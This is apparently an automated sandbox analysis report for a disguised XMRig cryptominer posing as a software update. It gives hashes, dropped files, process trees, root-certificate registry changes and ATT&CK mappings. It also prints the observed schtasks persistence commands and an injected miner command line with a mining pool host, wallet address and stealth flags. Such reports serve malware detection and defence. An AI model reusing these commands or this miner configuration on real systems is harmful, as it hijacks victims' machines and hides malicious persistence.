xmrig | b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae

Analysis

max time kernel
150s
max time network
116s
platform
windows7_x64
resource
win7v20210410
submitted
19-07-2021 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software updated v2.6.0.exe
Size

256KB
MD5

18d05e20731583a22b495d0d1f107c5b
SHA1

2ced0e3577063ca3613b43661e7df5bc1411ab09
SHA256

b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
SHA512

36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/856-119-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/856-120-0x00000001402EB66C-mapping.dmp	xmrig
behavioral1/memory/856-122-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

xmrmine.exeetcmin.exeserverpatch.exertksmbs.exesihost64.exesihost32.exe

pid process

1812 xmrmine.exe
1296 etcmin.exe
1876 serverpatch.exe
1536 rtksmbs.exe
1712 sihost64.exe
540 sihost32.exe
Loads dropped DLL 6 IoCs

Processes:

Software updated v2.6.0.exeetcmin.exexmrmine.exeserverpatch.exertksmbs.exe

pid process

1672 Software updated v2.6.0.exe
1672 Software updated v2.6.0.exe
1296 etcmin.exe
1812 xmrmine.exe
1876 serverpatch.exe
1536 rtksmbs.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

serverpatch.exe

description pid process target process

PID 1876 set thread context of 856 1876 serverpatch.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1480 schtasks.exe
932 schtasks.exe
1756 schtasks.exe
1864 schtasks.exe

pid	process
1812	xmrmine.exe
1296	etcmin.exe
1876	serverpatch.exe
1536	rtksmbs.exe
1712	sihost64.exe
540	sihost32.exe

pid	process
1672	Software updated v2.6.0.exe
1672	Software updated v2.6.0.exe
1296	etcmin.exe
1812	xmrmine.exe
1876	serverpatch.exe
1536	rtksmbs.exe

description	pid	process	target process
PID 1876 set thread context of 856	1876	serverpatch.exe	explorer.exe

pid	process
1480	schtasks.exe
932	schtasks.exe
1756	schtasks.exe
1864	schtasks.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

rtksmbs.exeserverpatch.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	rtksmbs.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	rtksmbs.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	serverpatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	serverpatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	serverpatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	serverpatch.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

etcmin.exexmrmine.exertksmbs.exeserverpatch.exe

pid process

1296 etcmin.exe
1812 xmrmine.exe
1536 rtksmbs.exe
1876 serverpatch.exe

pid	process
1296	etcmin.exe
1812	xmrmine.exe
1536	rtksmbs.exe
1876	serverpatch.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

etcmin.exexmrmine.exertksmbs.exeserverpatch.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1296	etcmin.exe
Token: SeDebugPrivilege	1812	xmrmine.exe
Token: SeDebugPrivilege	1536	rtksmbs.exe
Token: SeDebugPrivilege	1876	serverpatch.exe
Token: SeLockMemoryPrivilege	856	explorer.exe
Token: SeLockMemoryPrivilege	856	explorer.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

Software updated v2.6.0.exeetcmin.exexmrmine.execmd.execmd.exertksmbs.exeserverpatch.execmd.execmd.exe

description	pid	process	target process
PID 1672 wrote to memory of 1812	1672	Software updated v2.6.0.exe	xmrmine.exe
PID 1672 wrote to memory of 1812	1672	Software updated v2.6.0.exe	xmrmine.exe
PID 1672 wrote to memory of 1812	1672	Software updated v2.6.0.exe	xmrmine.exe
PID 1672 wrote to memory of 1812	1672	Software updated v2.6.0.exe	xmrmine.exe
PID 1672 wrote to memory of 1296	1672	Software updated v2.6.0.exe	etcmin.exe
PID 1672 wrote to memory of 1296	1672	Software updated v2.6.0.exe	etcmin.exe
PID 1672 wrote to memory of 1296	1672	Software updated v2.6.0.exe	etcmin.exe
PID 1672 wrote to memory of 1296	1672	Software updated v2.6.0.exe	etcmin.exe
PID 1296 wrote to memory of 920	1296	etcmin.exe	cmd.exe
PID 1296 wrote to memory of 920	1296	etcmin.exe	cmd.exe
PID 1296 wrote to memory of 920	1296	etcmin.exe	cmd.exe
PID 1812 wrote to memory of 1888	1812	xmrmine.exe	cmd.exe
PID 1812 wrote to memory of 1888	1812	xmrmine.exe	cmd.exe
PID 1812 wrote to memory of 1888	1812	xmrmine.exe	cmd.exe
PID 920 wrote to memory of 932	920	cmd.exe	schtasks.exe
PID 920 wrote to memory of 932	920	cmd.exe	schtasks.exe
PID 920 wrote to memory of 932	920	cmd.exe	schtasks.exe
PID 1888 wrote to memory of 1480	1888	cmd.exe	schtasks.exe
PID 1888 wrote to memory of 1480	1888	cmd.exe	schtasks.exe
PID 1888 wrote to memory of 1480	1888	cmd.exe	schtasks.exe
PID 1812 wrote to memory of 1876	1812	xmrmine.exe	serverpatch.exe
PID 1812 wrote to memory of 1876	1812	xmrmine.exe	serverpatch.exe
PID 1812 wrote to memory of 1876	1812	xmrmine.exe	serverpatch.exe
PID 1296 wrote to memory of 1536	1296	etcmin.exe	rtksmbs.exe
PID 1296 wrote to memory of 1536	1296	etcmin.exe	rtksmbs.exe
PID 1296 wrote to memory of 1536	1296	etcmin.exe	rtksmbs.exe
PID 1536 wrote to memory of 1152	1536	rtksmbs.exe	cmd.exe
PID 1536 wrote to memory of 1152	1536	rtksmbs.exe	cmd.exe
PID 1536 wrote to memory of 1152	1536	rtksmbs.exe	cmd.exe
PID 1876 wrote to memory of 1980	1876	serverpatch.exe	cmd.exe
PID 1876 wrote to memory of 1980	1876	serverpatch.exe	cmd.exe
PID 1876 wrote to memory of 1980	1876	serverpatch.exe	cmd.exe
PID 1152 wrote to memory of 1864	1152	cmd.exe	schtasks.exe
PID 1152 wrote to memory of 1864	1152	cmd.exe	schtasks.exe
PID 1152 wrote to memory of 1864	1152	cmd.exe	schtasks.exe
PID 1980 wrote to memory of 1756	1980	cmd.exe	schtasks.exe
PID 1980 wrote to memory of 1756	1980	cmd.exe	schtasks.exe
PID 1980 wrote to memory of 1756	1980	cmd.exe	schtasks.exe
PID 1876 wrote to memory of 1712	1876	serverpatch.exe	sihost64.exe
PID 1876 wrote to memory of 1712	1876	serverpatch.exe	sihost64.exe
PID 1876 wrote to memory of 1712	1876	serverpatch.exe	sihost64.exe
PID 1536 wrote to memory of 540	1536	rtksmbs.exe	sihost32.exe
PID 1536 wrote to memory of 540	1536	rtksmbs.exe	sihost32.exe
PID 1536 wrote to memory of 540	1536	rtksmbs.exe	sihost32.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe
PID 1876 wrote to memory of 856	1876	serverpatch.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe
"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1672

C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1812

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
4⤵
- Creates scheduled task(s)
PID:1480

C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
5⤵
- Creates scheduled task(s)
PID:1756

C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:1712

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
4⤵
- Creates scheduled task(s)
PID:932

C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
5⤵
- Creates scheduled task(s)
PID:1864

C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
d474de575c39b2d39c8583c5c065498a

SHA1
5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25

SHA256
7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf

SHA512
7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
f3c6c3bbbfd1a9ecc7b8b39244914347

SHA1
bdd6d74b592ad8e93a7189d4a6abb4815bb5cd3f

SHA256
653d9ce52affe145ce930b52bbfceb138cb0f689ce28017842af3355b50d544d

SHA512
56cd7b0d3282e3d58b8b6c8170ecf31812f89c873c0048ce7479ed63a6da7d723de09c91c44ad0c7e3381abe3e246de96fe159f52f5808f686224f327e54c96a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
c02d5bb6ca1f2bfcedfcc810ab6c0d70

SHA1
3f84e98b1acb842295b373de45b542b63cdce65b

SHA256
2919035d4e34a77b344953d111425dd1d92b111d57c10c77b0d82a4b732f10d6

SHA512
202b0d44d64b9346dfa4539fdfc8b2d227263e1cf36f82e785bcc035f4c9a74d19792d6dc40bec01f16a5035be60957f07c6de0cdd11006d3bf09262b543919d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\AppData\Roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

